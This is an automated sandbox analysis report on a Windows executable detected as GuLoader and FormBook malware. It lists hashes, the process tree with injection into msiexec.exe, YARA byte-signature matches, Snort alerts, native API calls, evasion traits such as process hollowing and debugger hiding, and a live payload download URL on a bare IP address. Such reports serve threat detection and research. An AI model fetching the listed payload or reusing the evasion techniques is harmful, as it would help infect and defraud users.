Analysis Report 2eD17GZuWs.exe

Overview

General Information

Sample Name: 2eD17GZuWs.exe
Analysis ID: 320425
MD5: c05eee88f0b57e853996957d6523397b
SHA1: fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
SHA256: 7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
Tags: exe, GuLoader

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 2eD17GZuWs.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
    • 2eD17GZuWs.exe (PID: 2936 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6244 cmdline: /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x22bc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x2970:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: 2eD17GZuWs.exe, Virustotal: Detection: 25%
    Yara detected FormBook
    Source: Yara match, File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then pop esi (13_2_01117295)
    Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then pop esi (13_2_011172A5)

    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49756 -> 103.125.191.5:80
    Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global traffic, HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 103.125.191.5 Cache-Control: no-cache
    Source: unknown, TCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmp, String found in binary or memory: http://103.125.191.5/
    Source: 2eD17GZuWs.exe, String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
    Source: 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmp, String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY
    Source: 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmp, String found in binary or memory: https://in_xMjelaYnr43.bin

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match, File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Potential malicious icon found
    Source: initial sample, Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe, Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5A6C NtProtectVirtualMemory,0_2_021D5A6C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread,TerminateProcess,CreateFileA,0_2_021D06B1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5336 NtSetInformationThread,LoadLibraryA,0_2_021D5336
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D232A NtWriteVirtualMemory,0_2_021D232A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5F9F NtResumeThread,0_2_021D5F9F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D078C NtWriteVirtualMemory,TerminateProcess,0_2_021D078C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B EnumWindows,NtSetInformationThread,0_2_021D044B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,0_2_021D54F4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D260D NtWriteVirtualMemory,0_2_021D260D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6239 NtResumeThread,0_2_021D6239
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D62C5 NtResumeThread,0_2_021D62C5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2705 NtWriteVirtualMemory,0_2_021D2705
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6325 NtResumeThread,0_2_021D6325
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0F7D NtWriteVirtualMemory,0_2_021D0F7D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D276A NtWriteVirtualMemory,0_2_021D276A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D23D5 NtWriteVirtualMemory,0_2_021D23D5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FC1 NtResumeThread,0_2_021D5FC1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D47EF NtSetInformationThread,0_2_021D47EF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FE5 NtResumeThread,0_2_021D5FE5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6015 NtResumeThread,0_2_021D6015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6039 NtResumeThread,0_2_021D6039
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5435 NtWriteVirtualMemory,0_2_021D5435
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2455 NtWriteVirtualMemory,0_2_021D2455
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6089 NtResumeThread,0_2_021D6089
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D24BD NtWriteVirtualMemory,0_2_021D24BD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04B2 NtSetInformationThread,0_2_021D04B2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D60D1 NtResumeThread,0_2_021D60D1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04CD NtSetInformationThread,0_2_021D04CD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0516 NtSetInformationThread,0_2_021D0516
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6106 NtResumeThread,0_2_021D6106
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0537 NtSetInformationThread,0_2_021D0537
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2531 NtWriteVirtualMemory,0_2_021D2531
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D059D NtSetInformationThread,0_2_021D059D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D05D9 NtSetInformationThread,0_2_021D05D9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D61ED NtResumeThread,0_2_021D61ED
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E189660
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E1896E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E189710
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E189780
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E1897A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,1_2_1E189540
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,1_2_1E1895D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E189A00
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,1_2_1E189A20
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,1_2_1E189A50
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,1_2_1E189840
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E189860
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E1898F0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E189910
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,1_2_1E1899A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189610 NtEnumerateValueKey,1_2_1E189610
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189650 NtQueryValueKey,1_2_1E189650
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189670 NtQueryInformationProcess,1_2_1E189670
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896D0 NtCreateKey,1_2_1E1896D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A710 NtOpenProcessToken,1_2_1E18A710
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189730 NtQueryVirtualMemory,1_2_1E189730
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A770 NtOpenThread,1_2_1E18A770
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189770 NtSetInformationFile,1_2_1E189770
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189760 NtOpenProcess,1_2_1E189760
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189FE0 NtCreateMutant,1_2_1E189FE0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18AD30 NtSetContextThread,1_2_1E18AD30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189520 NtWaitForSingleObject,1_2_1E189520
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189560 NtWriteFile,1_2_1E189560
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895F0 NtQueryInformationFile,1_2_1E1895F0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A10 NtQuerySection,1_2_1E189A10
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A80 NtOpenDirectoryObject,1_2_1E189A80
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189B00 NtSetValueKey,1_2_1E189B00
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A3B0 NtGetContextThread,1_2_1E18A3B0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189820 NtEnumerateKey,1_2_1E189820
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18B040 NtSuspendThread,1_2_1E18B040
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898A0 NtWriteVirtualMemory,1_2_1E1898A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189950 NtQueueApcThread,1_2_1E189950
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899D0 NtCreateProcessEx,1_2_1E1899D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565A6C NtProtectVirtualMemory,1_2_00565A6C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565F9F NtSetInformationThread,1_2_00565F9F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566015 NtSetInformationThread,1_2_00566015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566039 NtSetInformationThread,1_2_00566039
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005660D1 NtSetInformationThread,1_2_005660D1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566089 NtSetInformationThread,1_2_00566089
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566106 NtSetInformationThread,1_2_00566106
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005661ED NtSetInformationThread,1_2_005661ED
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566239 NtSetInformationThread,1_2_00566239
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005662C5 NtSetInformationThread,1_2_005662C5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566325 NtSetInformationThread,1_2_00566325
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FC1 NtSetInformationThread,1_2_00565FC1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FE5 NtSetInformationThread,1_2_00565FE5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119540 NtReadFile,LdrInitializeThunk,13_2_05119540
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195D0 NtClose,LdrInitializeThunk,13_2_051195D0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119FE0 NtCreateMutant,LdrInitializeThunk,13_2_05119FE0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_05119660
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_051196E0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_05119910
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,13_2_05119860
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A50 NtCreateFile,LdrInitializeThunk,13_2_05119A50
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511AD30 NtSetContextThread,13_2_0511AD30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119520 NtWaitForSingleObject,13_2_05119520
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119560 NtWriteFile,13_2_05119560
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195F0 NtQueryInformationFile,13_2_051195F0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A710 NtOpenProcessToken,13_2_0511A710
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119710 NtQueryInformationToken,13_2_05119710
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119730 NtQueryVirtualMemory,13_2_05119730
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A770 NtOpenThread,13_2_0511A770
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119770 NtSetInformationFile,13_2_05119770
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119760 NtOpenProcess,13_2_05119760
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119780 NtMapViewOfSection,13_2_05119780
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051197A0 NtUnmapViewOfSection,13_2_051197A0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119610 NtEnumerateValueKey,13_2_05119610
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119650 NtQueryValueKey,13_2_05119650
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119670 NtQueryInformationProcess,13_2_05119670
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051196D0 NtCreateKey,13_2_051196D0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119950 NtQueueApcThread,13_2_05119950
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051199A0 NtCreateSection,13_2_051199A0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051199D0 NtCreateProcessEx,13_2_051199D0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119820 NtEnumerateKey,13_2_05119820
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0511B040 NtSuspendThread,13_2_0511B040
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119840 NtDelayExecution,13_2_05119840
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051198A0 NtWriteVirtualMemory,13_2_051198A0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_051198F0 NtReadVirtualMemory,13_2_051198F0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119B00 NtSetValueKey,13_2_05119B00
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0511A3B0 NtGetContextThread,13_2_0511A3B0
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119A10 NtQuerySection,13_2_05119A10
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119A00 NtProtectVirtualMemory,13_2_05119A00
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119A20 NtResumeThread,13_2_05119A20
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_05119A80 NtOpenDirectoryObject,13_2_05119A80
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119D50 NtCreateFile,13_2_01119D50
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119F30 NtAllocateVirtualMemory,13_2_01119F30
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119E00 NtReadFile,13_2_01119E00
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119E80 NtClose,13_2_01119E80
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119D4B NtCreateFile,13_2_01119D4B
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119DA4 NtCreateFile,13_2_01119DA4
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119DFE NtReadFile,13_2_01119DFE
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119F2B NtAllocateVirtualMemory,13_2_01119F2B
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_01119E7A NtClose,13_2_01119E7A
    Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 050DB150 appears 45 times
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe Code function: String function: 1E14B150 appears 66 times
    Source: 2eD17GZuWs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: 2eD17GZuWs.exe, 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000000.00000002.691998474.0000000002090000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsiexec.exeX vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.933965294.000000001E3CF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.928375557.00000000008D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000000.690796127.000000000040F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe Binary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
